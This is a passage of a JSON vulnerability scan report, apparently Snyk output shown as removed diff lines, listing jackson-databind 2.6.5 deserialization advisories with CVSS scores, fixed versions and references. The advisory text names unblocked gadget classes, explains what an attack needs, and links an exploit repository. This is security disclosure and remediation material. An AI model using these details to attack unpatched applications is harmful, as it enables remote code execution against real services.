"https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2449", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.808389Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", - "epssDetails": { - "percentile": "0.71702", - "probability": "0.00342", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16335" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-85cw-hj65-qqv9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:06.837179Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:30:24Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:30:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.931793Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "iSafeBlue" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2410", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.892322Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", - "epssDetails": { - "percentile": "0.74104", - "probability": "0.00410", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14540" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h822-r4r5-v8jg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:10.401907Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:27:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:27:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.008832Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2420", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:32.899468Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T14:43:42.115110Z", - "functions_new": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-16T14:37:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T14:37:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:32.899468Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:50.462784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.688214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.988000Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", - "epssDetails": { - "percentile": "0.73908", - "probability": "0.00404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16942" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mx7p-6679-8g3q" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-10-02T08:02:18.178548Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-01T17:43:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-10-02T17:43:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.988000Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "bsmali4" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10.1)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.1", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2478", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.814203Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:13.709990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.024581Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub 